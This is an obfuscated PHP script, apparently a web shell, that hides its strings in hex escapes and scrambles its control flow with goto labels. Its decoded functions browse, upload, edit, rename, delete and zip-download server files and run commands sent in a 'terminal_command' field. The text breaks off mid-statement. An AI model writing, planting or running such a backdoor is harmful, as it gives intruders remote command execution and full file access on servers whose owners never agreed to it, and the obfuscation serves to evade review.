b1uPF: O90Z2: goto r_vwm; F1mLK: @ini_set("\x64\151\163\160\154\x61\171\x5f\145\162\162\x6f\x72\x73", "\x31"); goto k3PS5; MCIl3: @chmod($HsbRa, 0644); goto FuesT; h1mBl: echo "\x20\x20\x20\40\x3c\x2f\144\151\x76\x3e\xd\xa\x20\40\x20\40"; goto hoU0h; Wiy0t: $uzhX9 = "\x52\x65\156\x61\155\145\40\x66\141\151\x6c\x65\144\72\40\x53\x6f\x75\x72\x63\x65\40\156\x6f\x74\x20\146\x6f\x75\x6e\x64"; goto auYJE; Wwbm5: if (@file_put_contents($qftpV, $BF69Z) !== false) { goto OHL3w; } goto wmLD8; B0LNP: if (!$uzhX9) { goto g1hF0; } goto YjwSu; GHp1w: echo htmlentities($QlLsI); goto xktV2; CkPd3: if ($qftpV === false || !is_file($qftpV)) { goto al1vo; } goto LZmjk; SnOAb: kjsBT: goto pscwO; pscwO: $uzhX9 = "\x43\x72\x65\141\x74\x65\40\146\141\x69\x6c\145\144\72\40\x46\157\154\x64\x65\x72\40\x61\154\162\145\x61\x64\x79\40\145\x78\x69\x73\164\163"; goto j4aOz; TiYuu: echo addslashes($_SESSION["\143\x75\x72\x72\x65\x6e\x74\x5f\144\x69\162"]); goto Bgke0; RlC4G: $uzhX9 = "\102\x75\x6c\153\x20\x64\x6f\x77\x6e\x6c\x6f\141\x64\x20\x66\x61\x69\154\145\144\72\40\x43\157\x75\154\x64\40\x6e\157\x74\40\x63\x72\145\x61\x74\x65\40\172\x69\160\40\x66\151\154\x65"; goto AUmmT; eJdwj: jTm6u: goto mdFYu; YLIuH: echo base64_encode($QlLsI); goto fHFhk; adyWM: http_response_code(500); goto TZ2rP; H92ws: $D1TWc->close(); goto RFr1L; VIATB: if ($_FILES["\146\x69\154\145\x5f\165\x70\154\157\141\144"]["\145\162\162\157\162"] === UPLOAD_ERR_OK) { goto pofAX; } goto I66v0; KlIvc: header("\x43\157\x6e\x74\145\x6e\x74\55\x44\x69\163\160\x6f\x73\x69\164\151\x6f\156\72\40\x61\x74\164\x61\x63\x68\x6d\145\x6e\164\73\x20\x66\151\154\x65\x6e\x61\x6d\145\x3d\42" . $i2cFz . "\x22"); goto cXVOj; HYlGl: if ($v91o9 === false) { goto EMQGQ; } goto D7Zbf; cmqOg: $OIEuk = $VW3Pb ? @file_get_contents($Q2jV2 . "\57" . $VW3Pb) : null; goto DSlAz; I66v0: $M_PwM = [UPLOAD_ERR_INI_SIZE => "\x46\151\154\145\x20\145\x78\143\145\x65\144\163\x20\x75\x70\x6c\x6f\141\144\137\x6d\141\x78\x5f\x66\x69\154\145\x73\151\172\x65", UPLOAD_ERR_FORM_SIZE => "\106\x69\154\145\x20\145\x78\143\145\145\x64\x73\x20\115\101\130\x5f\x46\111\114\x45\x5f\x53\111\132\105", UPLOAD_ERR_PARTIAL => "\x46\x69\x6c\145\40\x70\x61\x72\164\x69\x61\154\x6c\171\x20\165\x70\154\157\x61\x64\x65\144", UPLOAD_ERR_NO_TMP_DIR => "\115\151\x73\x73\151\x6e\x67\40\164\145\155\x70\x6f\162\x61\x72\x79\40\x66\157\154\x64\x65\x72", UPLOAD_ERR_CANT_WRITE => "\x46\141\151\154\145\x64\40\164\157\x20\167\162\x69\164\145\x20\146\x69\154\145\40\x74\x6f\x20\x64\x69\x73\x6b", UPLOAD_ERR_EXTENSION => "\125\x70\154\157\141\x64\x20\x73\164\157\x70\160\145\x64\40\x62\171\40\x65\x78\x74\145\x6e\163\x69\157\x6e"]; goto hCnEm; KM_E4: goto UysJt; goto yYsE9; YXUmT: $uzhX9 = "\x44\x6f\167\156\x6c\x6f\141\144\40\x66\x61\151\154\x65\x64\x3a\x20\x5a\151\x70\x41\x72\143\x68\151\x76\145\x20\x6e\x6f\x74\40\x61\166\141\x69\154\141\142\154\145"; goto m8crX; xktV2: echo "\74\x2f\164\x65\170\164\141\x72\x65\x61\76\xd\xa\40\40\40\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x3c\x64\151\166\x20\163\164\171\x6c\145\x3d\42\x6d\x61\x72\147\151\x6e\x2d\x74\x6f\x70\72\x20\61\62\x70\170\73\42\76\xd\xa\40\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\40\74\x62\165\x74\164\157\156\x20\143\154\x61\163\x73\75\x22\142\x74\156\40\142\164\x6e\55\x70\162\x69\155\141\x72\171\x22\40\164\x79\160\145\75\x22\x73\165\x62\155\x69\x74\x22\40\157\156\143\154\151\x63\x6b\x3d\42\163\171\156\x63\105\144\151\x74\157\162\x43\x6f\156\164\145\x6e\x74\x28\51\42\x3e\x53\141\166\x65\x20\103\150\141\x6e\x67\145\x73\74\x2f\x62\x75\x74\164\x6f\156\76\xd\xa\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\40\40\74\x2f\144\x69\x76\76\xd\xa\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x3c\57\x66\157\162\x6d\x3e\xd\xa\40\40\x20\40\40\40\40\40\74\57\144\151\166\76\xd\xa\40\40\40\x20"; goto r4saX; PAXDJ: eO34e: goto eJdwj; np3fe: uiEWB: goto OsjFJ; ywTjj: if (!true) { goto MrJgb; } goto IKX6E; m8crX: goto zD1QE; goto np3fe; bcUUU: $pnUrl = false; goto Hd3GM; OjlkC: $YKJaG = "\x44\145\x6c\x65\164\x65\144\40{$ZTqqh}\x20\x69\164\x65\x6d\x28\163\51"; goto Blqis; R7Z0O: goto jTm6u; goto r9Zuw; qWRyx: boaWi: goto LGC2j; BE4J9: $BF69Z = base64_decode($_POST["\x66\151\x6c\145\137\143\157\156\164\x65\156\x74"]); goto Wwbm5; oJdkw: exit("\x49\x6e\x76\x61\x6c\151\x64\40\x66\151\154\x65\156\141\x6d\x65"); goto OHx8B; BEDfw: if ($x0vZt === false) { goto Z9PPO; } goto OX7Zf; Lc5kS: $r20dt = basename($_GET["\x6e\x61\155\145"]); goto OZ3r0; OZ3r0: if (!(strpos($r20dt, "\x2e\56") !== false || strpos($r20dt, "\57") !== false || strpos($r20dt, "\134") !== false)) { goto hfYdf; } goto y3Usk; rDcmQ: if (!is_writable($_SESSION["\x63\x75\x72\162\x65\156\164\x5f\144\x69\162"])) { goto EofqJ; } goto zz_Vc; QqulX: foreach ($_POST["\163\145\154\x65\x63\164\145\144\x5f\x69\164\145\x6d\x73"] as $zKV6z) { goto MxFW_; wO8kQ: goto MBBQm; goto nT5r9; NTrXs: llIuw: goto Kfa7W; nT5r9: KNyQV: goto LJM6t; LJM6t: $D1TWc->addFile($x0vZt, basename($x0vZt)); goto Stph2; oGpxl: Lby3U: goto n0R6z; HllpA: MBBQm: goto NTrXs; MXH3B: if (!($x0vZt === false)) { goto Lby3U; } goto VbcmS; eVRWl: if (is_dir($x0vZt)) { goto xESRp; } goto wO8kQ; VbcmS: goto llIuw; goto oGpxl; Stph2: goto MBBQm; goto NjQSk; MxFW_: $x0vZt = o6Vei($_SESSION["\x63\x75\x72\x72\145\x6e\x74\137\x64\x69\162"] . DIRECTORY_SEPARATOR . $zKV6z); goto MXH3B; EEemH: r6fEs: goto HllpA; Z1xXm: foreach ($DES8d as $zNRKh) { goto SZwS4; hrADK: bVy_1: goto OYxal; Ye14c: $D1TWc->addFile($idnI2, $Sn_2U); goto vr5Wp; onsZC: cNh2q: goto t5cWK; vr5Wp: goto bVy_1; goto onsZC; t5cWK: $D1TWc->addEmptyDir($Sn_2U); goto hrADK; ElNvM: $Sn_2U = basename($x0vZt) . "\57" . substr($idnI2, strlen($x0vZt) + 1); goto maA31; OYxal: m1pCo: goto H4y2v; maA31: if ($zNRKh->isDir()) { goto cNh2q; } goto Ye14c; SZwS4: $idnI2 = $zNRKh->getRealPath(); goto ElNvM; H4y2v: } goto EEemH; n0R6z: if (is_file($x0vZt)) { goto KNyQV; } goto eVRWl; NjQSk: xESRp: goto P6jA7; P6jA7: $DES8d = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($x0vZt, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); goto Z1xXm; Kfa7W: } goto s6UaV; DSlAz: if (!(isset($_POST["\142\x75\x6c\x6b\x5f\144\145\x6c\145\x74\x65"]) && isset($_POST["\163\x65\154\145\143\x74\145\144\137\x69\164\x65\x6d\x73"]) && is_array($_POST["\x73\x65\154\145\143\x74\x65\144\x5f\x69\x74\x65\x6d\163"]))) { goto G9EdE; } goto ZFGqH; Z3WAa: $uzhX9 = "\125\160\154\157\141\x64\40\x66\x61\151\x6c\x65\x64\x3a\x20\111\x6e\166\141\154\151\x64\x20\146\151\x6c\x65\156\141\x6d\x65"; goto j36Ps; s90wl: $uzhX9 = "\125\160\x6c\157\x61\x64\40\146\141\x69\154\x65\x64\x3a\40\104\x69\162\145\x63\x74\x6f\162\171\40\x6e\157\x74\40\x77\162\x69\x74\141\x62\154\x65"; goto SvsGb; mErIG: WKUba: goto QMPXl; k2o7Y: $r20dt = basename($_FILES["\x66\x69\154\145\x5f\165\160\154\157\141\x64"]["\x6e\x61\x6d\x65"]); goto fm1oF; oh9WD: $YKJaG = "\x46\x69\x6c\x65\40\x73\x61\x76\x65\x64"; goto mw6oe; NnvCU: if (!($QTgbB > 0)) { goto Esj8k; } goto VpuDA; T5ppl: qIGsR: goto Z3WAa; tBRDk: header("\103\x6f\156\x74\x65\156\164\55\x54\x79\x70\145\x3a\x20\x61\x70\160\154\151\143\x61\x74\151\x6f\156\57\x7a\x69\x70"); goto KlIvc; FHYHb: a6v9M: goto s90wl; q1BhG: if (is_file($x0vZt)) { goto WKUba; } goto OP8vV; EWKD4: $g04QC = scandir($Q2jV2); goto Q1hmn; H4tjj: if (is_dir($x0vZt)) { goto Z65DM; } goto M8wiY; Geji6: Zl4qs: goto ywTjj; IcpMT: goto jqvB0; goto LZmru; Sb2HV: OYdyB: goto e0F9Y; D7Zbf: $gMlMH = $_SESSION["\x63\165\162\162\145\x6e\164\x5f\144\151\x72"] . DIRECTORY_SEPARATOR . $v91o9; goto cBmR5; pk3WM: if (!(isset($_POST["\164\145\x72\155\x69\x6e\x61\x6c\x5f\x63\157\x6d\x6d\141\x6e\144"]) && trim($_POST["\x74\x65\162\155\151\x6e\141\154\137\143\157\x6d\x6d\141\156\144"]) !== '')) { goto n3o0m; } goto d2ATt; pEryf: $uzhX9 = "\x43\x72\145\141\164\145\40\146\141\151\154\x65\144\72\x20\x46\x69\154\145\x20\x61\154\x72\145\141\x64\x79\40\x65\170\x69\x73\x74\x73"; goto ify_d; Jiy2N: goto O90Z2; goto Kk3RZ; yqh7v: al1vo: goto m7EbG; nJJj8: $mTJ38 = sys_get_temp_dir() . "\57\160\150\x70\137\163\145\163\x73\151\157\156\163"; goto PbJYH; I9k05: if (!is_writable($_SESSION["\143\x75\x72\162\x65\x6e\164\x5f\x64\x69\162"])) { goto f3dXs; } goto uUKZl; lQgMT: MrJgb: goto T9SYg; FSGQU: goto rriu9; goto WQYgg; YYsUM: @unlink($tDWqL); goto Pje6A; i_z64: if (!isset($_POST["\x6f\x6c\144\137\156\x61\155\145"], $_POST["\156\x65\x77\137\x6e\x61\155\x65"])) { goto IuKgI; } goto LKGKC; U9tPG: IuKgI: goto Ok8WN; zTdTT: $SLAxm = dirname($fzbkj) . DIRECTORY_SEPARATOR . basename($_POST["\x6e\x65\x77\137\156\x61\x6d\145"]); goto jMgd3; r_vwm: zD1QE: goto QUOVU; pkvWy: ini_set("\163\x65\163\163\151\157\156\x2e\x73\x61\x76\x65\137\x70\x61\x74\x68", $mTJ38); goto btKxl; P511M: if (empty($t4BqW)) { goto PjjUi; } goto drvHl; Olm0v: k0uWF: goto lnrl_; ZpxVy: echo "\xd\12\40\40\40\x20"; goto NofKf; fbKT2: J3RxO: goto Lzkkc; MMehg: PjjUi: goto YfOac; mgbXN: F4fiN: goto Olm0v; MImRn: header("\103\x6f\156\x74\x65\x6e\164\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\156\72\40\141\164\164\141\x63\x68\x6d\x65\x6e\x74\x3b\x20\146\151\154\145\x6e\x61\x6d\x65\75\x22" . basename($x0vZt) . "\42"); goto z88s7; Hllvx: $FNVfK = ''; goto bcUUU; Df_10: cc1NW: goto H92ws; T9SYg: DIjmJ: goto V8W0Y; taTk5: Esj8k: goto Z89z6; IIC1k: if (!is_dir($a8u65)) { goto YMh5d; } goto nA5BN; yRz7h: goto DIjmJ; goto ZWRA5; sfYm7: error_reporting(E_ALL); goto nJJj8; rC_xh: echo htmlentities($FNVfK); goto YvXkK; iofzz: $Q2jV2 = $_SESSION["\x63\x75\x72\162\145\x6e\x74\137\144\151\x72"]; goto EWKD4; d2ATt: $t4BqW = trim($_POST["\164\x65\162\155\151\x6e\x61\154\137\x63\157\155\155\141\x6e\x64"]); goto P511M; fHFhk: echo "\x3c\x2f\x74\x65\x78\x74\141\162\x65\x61\x3e\15\12\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\74\x74\145\x78\x74\x61\162\145\141\40\151\144\x3d\x22\145\144\151\x74\157\x72\x2d\x64\x69\163\x70\x6c\141\x79\42\40\x73\164\171\x6c\145\x3d\42\150\145\151\147\150\x74\x3a\x20\65\60\x30\x70\170\73\x22\x3e"; goto GHp1w; kEQxO: fclose($onaac); goto ikIEr; RJlNx: echo htmlentities($dOeky); goto xKoI0; q5nop: if (!is_writable($_SESSION["\x63\165\x72\x72\145\156\164\137\144\x69\x72"])) { goto a6v9M; } goto FMgJE; efqQ_: if (is_dir($a8u65)) { goto BNiQB; } goto WTNe9; EjGE3: goto IjDPn; goto jbFRS; tWBhg: echo "\x3c\57\144\x69\x76\76\15\xa\x20\x20\x20\40"; goto PruBO; B501c: TrqeU: goto h1mBl; Z89z6: G9EdE: goto Kfltx; QUOVU: wllDN: goto ijH76; rqHWg: QFxNh: goto Kj8lM; LKGKC: $fzbkj = O6VEi($_SESSION["\143\165\162\162\145\156\x74\137\144\151\162"] . DIRECTORY_SEPARATOR . $_POST["\157\154\x64\x5f\156\x61\155\145"]); goto lN9hx; OaxkT: $DES8d = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($x0vZt, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST); goto an71K; k24ke: foreach ($l45RL as $zKV6z) { goto oMloy; pdAEI: echo "\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x3c\57\x66\x6f\162\155\x3e\xd\12\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x3c\x66\157\x72\x6d\x20\155\145\x74\150\157\144\75\42\160\157\x73\164\x22\x20\143\154\x61\x73\163\75\x22\x72\145\x6e\141\155\x65\55\x66\x6f\162\x6d\42\76\15\12\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x3c\x69\156\x70\x75\164\40\x74\x79\x70\x65\75\42\x68\151\144\x64\x65\156\42\x20\156\x61\155\x65\75\42\x6f\154\144\x5f\156\141\x6d\x65\x22\40\x76\141\x6c\x75\145\75\x22"; goto Gpm3V; e7rfM: echo $zKV6z; goto UwfNc; pQoXa: echo "\x22\40\157\156\143\x6c\151\143\x6b\x3d\x22\165\x70\x64\x61\x74\145\102\x75\154\153\x41\x63\x74\151\x6f\x6e\163\50\x29\x22\76\xd\12\x20\x20\x20\40\40\40\40\40\40\x20\x20\x20\40\x20\40\40\x3c\57\164\144\76\xd\12\x20\x20\x20\x20\40\x20\40\40\40\x20\40\40\40\40\x20\x20\x3c\164\x64\x3e\15\12\40\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x20\40\40"; goto pcUZR; EFNWg: echo $OdbQV ? "\x46\x6f\x6c\x64\x65\162" : "\106\151\154\x65"; goto Zy0i_; cV0fg: echo $zKV6z; goto K135U; jETdC: goto Orjn4; goto IoR6b; PwoQ0: bByY5: goto zgg9b; Tqr3N: goto bByY5; goto CKwyr; CKwyr: ha7kM: goto fXcZm; Zy0i_: echo "\x20\x20\x20\40\40\40\40\40\40\40\x20\40\40\40\40\x20\x20\40\x20\x20\x3c\57\x73\160\x61\156\x3e\xd\12\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\x20\40\74\57\164\144\x3e\15\xa\40\x20\40\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\x3c\x74\144\76\xd\12\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\x20\x20\x3c\x64\x69\166\40\143\154\141\x73\x73\x3d\x22\141\x63\164\x69\x6f\x6e\55\x62\x75\x74\x74\157\156\x73\42\76\xd\xa\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\40\40\40\40\40\40\x20"; goto i4D1R; tIV0u: echo "\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\74\146\x6f\x72\x6d\x20\x6d\145\x74\x68\x6f\x64\x3d\42\x70\x6f\163\x74\42\x3e\xd\xa\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\74\142\x75\164\x74\157\x6e\40\x6e\141\155\145\x3d\42\x76\x69\x65\167\x22\40\166\x61\154\165\x65\75\42"; goto cV0fg; TKojJ: echo $RWa01; goto pctfU; xDmBw: echo htmlentities($zKV6z); goto pQoXa; iFsnm: echo "\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\74\x2f\x74\x64\x3e\xd\12\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\74\x74\144\76\15\xa\x20\40\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\x3c\163\x70\x61\156\x20\x63\154\x61\163\x73\75\42"; goto zU29A; iDRii: echo $OdbQV ? "\57" : ''; goto GOCBv; Gpm3V: echo htmlentities($zKV6z); goto SAH76; pT8QV: vkBqJ: goto lvECr; VZsYg: echo "\x22\40\x63\x6c\141\163\163\x3d\x22\x62\x74\x6e\40\142\164\x6e\x2d\x73\x6d\42\76\105\144\151\x74\74\57\x62\165\164\164\x6f\x6e\x3e\15\12\40\40\40\40\40\x20\40\40\40\40\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\74\x2f\x66\x6f\162\155\76\15\12\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20"; goto Tqr3N; zgg9b: echo "\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\40\40\40\74\146\x6f\x72\x6d\40\155\x65\x74\150\157\144\75\x22\160\x6f\163\x74\42\x3e\15\12\x20\x20\40\40\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\74\x62\165\164\x74\x6f\156\40\156\x61\x6d\145\x3d\x22\x64\157\167\156\x6c\157\x61\x64\x22\x20\166\x61\154\x75\x65\x3d\x22"; goto e7rfM; HBSBR: echo htmlentities($zKV6z); goto hHkf_; l05Tn: echo $zKV6z; goto VZsYg; pcUZR: if ($ebCMv === $zKV6z) { goto xmZnX; } goto jK9jE; f_TZE: echo $zKV6z; goto gSzWw; VFl_i: echo $zKV6z; goto bveRV; bveRV: echo "\42\40\x63\x6c\x61\x73\x73\x3d\42\x62\x74\x6e\40\x62\x74\156\55\163\155\x22\76\x52\x65\x6e\x61\x6d\x65\74\57\x62\165\164\164\x6f\x6e\76\15\12\40\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\x3c\x2f\x66\x6f\162\x6d\76\xd\xa\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\x3c\x66\x6f\162\x6d\x20\x6d\x65\x74\150\x6f\x64\x3d\x22\x70\x6f\163\x74\x22\76\15\12\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\x20\40\74\x62\165\164\x74\157\156\x20\x6e\x61\155\x65\75\x22\x72\x65\155\157\166\x65\42\x20\x76\141\154\165\x65\75\42"; goto f_TZE; iOlze: echo "\x22\x3e\xd\12\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x20\40\x20\40\40"; goto EFNWg; SAH76: echo "\42\x3e\15\12\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\40\x20\40\40\40\40\x20\x20\x3c\x69\x6e\x70\x75\164\40\164\x79\x70\x65\x3d\42\x74\145\x78\164\x22\40\156\x61\x6d\x65\75\42\x6e\145\x77\137\x6e\141\x6d\145\x22\x20\x76\141\154\x75\x65\75\42"; goto XFJOr; XFJOr: echo htmlentities($zKV6z); goto ci5T4; zU29A: echo $KpqMV ? "\164\x79\x70\145\x2d\x77\162\151\164\141\x62\x6c\145" : "\x74\171\x70\x65\x2d\x72\145\x61\x64\157\x6e\154\x79"; goto iOlze; OwY36: echo "\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\x3c\x74\162\x3e\xd\12\x20\40\40\40\40\x20\x20\40\x20\40\40\40\40\40\40\x20\x3c\x74\144\76\xd\xa\x20\40\x20\40\x20\x20\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\40\x20\74\x69\x6e\x70\x75\164\x20\164\x79\x70\x65\x3d\x22\143\150\x65\x63\x6b\142\x6f\170\x22\x20\156\x61\x6d\x65\75\x22\163\x65\x6c\x65\x63\164\x65\x64\137\151\x74\x65\x6d\163\x5b\135\42\40\x76\141\x6c\x75\x65\75\42"; goto xDmBw; tPHi3: Orjn4: goto iFsnm; hHkf_: echo "\x3c\57\163\160\141\x6e\x3e\xd\xa\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40"; goto jETdC; K135U: echo "\x22\x20\x63\154\141\163\x73\x3d\x22\142\x74\x6e\x20\142\164\x6e\55\x73\155\x22\x3e\126\151\145\x77\74\x2f\x62\165\164\x74\x6f\156\x3e\xd\xa\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x20\x3c\x2f\146\157\x72\x6d\x3e\xd\xa\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\x20\74\x66\x6f\x72\x6d\40\x6d\145\x74\150\157\144\75\42\160\157\x73\x74\x22\x3e\15\12\x20\40\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\x20\40\x20\40\40\40\40\74\142\x75\x74\164\157\156\40\156\141\155\x65\75\42\x65\x64\151\164\42\x20\166\x61\154\165\145\x3d\x22"; goto l05Tn; fXcZm: echo "\x20\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\74\146\157\x72\155\40\155\x65\x74\x68\x6f\x64\75\x22\x70\157\x73\164\x22\x3e\15\12\40\x20\x20\40\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x3c\142\x75\x74\x74\x6f\156\40\x6e\x61\155\x65\75\42\156\141\166\x69\x67\x61\164\145\x22\40\166\141\154\x75\145\75\42"; goto TKojJ; GOCBv: echo "\x3c\x2f\x73\160\141\x6e\x3e\xd\xa\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x3c\x73\x70\141\x6e\x20\x63\x6c\141\163\x73\75\x22\x66\x69\x6c\x65\x2d\156\141\155\x65\42\x3e"; goto HBSBR; ci5T4: echo "\42\76\15\xa\40\x20\x20\x20\x20\40\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\x3c\142\x75\164\x74\x6f\x6e\40\143\x6c\141\163\163\x3d\x22\142\x74\156\x20\142\x74\x6e\55\160\162\x69\x6d\x61\x72\171\40\142\164\x6e\55\x73\x6d\x22\x20\164\171\160\145\x3d\x22\x73\165\x62\x6d\151\164\x22\76\123\141\166\145\74\57\x62\165\164\164\x6f\x6e\x3e\15\xa\40\x20\40\40\x20\x20\40\x20\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\40\x20\74\57\x66\x6f\162\155\76\15\xa\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\40\74\x66\x6f\162\155\40\x6d\145\164\x68\x6f\144\75\x22\x70\157\163\x74\42\40\151\144\75\x22\146\151\154\145\x2d\146\x6f\x72\155\x22\x3e\xd\xa\40\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20"; goto tPHi3; IoR6b: xmZnX: goto pdAEI; i4D1R: if ($OdbQV) { goto ha7kM; } goto tIV0u; xKwmY: $KpqMV = is_writable($RWa01); goto OwY36; oMloy: $RWa01 = $Q2jV2 . "\57" . $zKV6z; goto aIaL8; gSzWw: echo "\x22\40\x63\x6c\x61\163\163\x3d\42\x62\164\156\40\x62\x74\156\x2d\x64\141\x6e\147\145\x72\x20\142\x74\x6e\x2d\x73\x6d\x22\40\157\x6e\x63\x6c\x69\143\x6b\x3d\42\162\x65\164\165\162\x6e\40\x63\157\x6e\146\151\162\155\50\47\104\145\x6c\x65\x74\145\40\164\150\x69\163\x20\151\164\x65\155\77\x27\x29\x22\x3e\104\x65\x6c\x65\x74\145\74\x2f\x62\x75\x74\164\157\x6e\76\15\12\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x3c\x2f\146\157\162\155\x3e\xd\xa\x20\40\x20\x20\x20\x20\x20\40\40\40\40\40\40\40\40\40\40\x20\40\40\x3c\x2f\x64\151\166\x3e\xd\xa\40\x20\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\74\57\x74\x64\x3e\xd\12\40\40\40\x20\40\x20\40\40\40\40\40\x20\x3c\x2f\x74\x72\76\xd\12\40\x20\x20\40\40\40\40\40"; goto pT8QV; pctfU: echo "\42\x20\x63\154\x61\163\x73\x3d\x22\x62\164\156\x20\142\164\x6e\x2d\x73\155\x22\x3e\x4f\x70\x65\x6e\x3c\x2f\142\x75\x74\164\x6f\156\x3e\15\12\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\40\40\40\x20\40\x20\x20\40\40\40\40\40\x3c\x2f\x66\x6f\x72\155\76\xd\xa\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20"; goto PwoQ0; aIaL8: $OdbQV = is_dir($RWa01); goto xKwmY; jK9jE: echo "\40\40\40\40\40\x20\x20\40\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\74\163\160\x61\x6e\x20\143\154\x61\x73\163\x3d\42\146\x69\154\x65\x2d\151\143\x6f\156\42\76"; goto iDRii; UwfNc: echo "\x22\x20\x63\x6c\141\x73\x73\75\x22\x62\x74\x6e\x20\x62\x74\156\x2d\163\x6d\x22\x3e\x44\x6f\x77\x6e\x6c\x6f\141\144\x3c\57\142\x75\x74\x74\x6f\x6e\x3e\xd\12\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\x20\x20\40\x3c\57\x66\x6f\x72\x6d\x3e\xd\xa\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\x20\x20\x3c\x66\157\162\155\x20\x6d\145\x74\150\x6f\x64\75\42\160\x6f\x73\164\x22\76\xd\12\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\40\40\40\40\40\x20\40\x20\x20\40\74\x62\165\x74\164\157\156\40\156\x61\155\145\75\42\162\145\156\x61\x6d\145\x22\40\x76\x61\x6c\165\x65\75\42"; goto VFl_i; lvECr: } goto QcLa1; fGudz: if (@rename($fzbkj, $SLAxm)) { goto sWKDG; } goto VmHpR; fm1oF: $HsbRa = rtrim($_SESSION["\x63\165\162\x72\145\x6e\164\137\144\x69\x72"], "\x2f\134") . DIRECTORY_SEPARATOR . $r20dt; goto i4DIn; rbM1o: goto F4fiN; goto yqh7v; UllbL: $R4MJ2 = $_SESSION["\143\165\162\x72\145\156\x74\137\x64\151\162"] . DIRECTORY_SEPARATOR . $r20dt; goto kuqTW; Tf5Tq: http_response_code(200); goto DjJHj; cXVOj: header("\103\157\156\164\145\156\164\55\x4c\145\x6e\x67\164\150\72\40" . filesize($tDWqL)); goto A3Ouq; jKlB8: $_SESSION["\143\165\162\162\145\x6e\164\137\144\151\x72"] = getcwd(); goto qWRyx; Fo25L: YsLZC: goto SYaet; hp5FQ: goto IjDPn; goto X1KoT; A3Ouq: readfile($tDWqL); goto Z9WLM; cBmR5: if (file_exists($gMlMH)) { goto kjsBT; } goto rDcmQ; kbjH0: echo 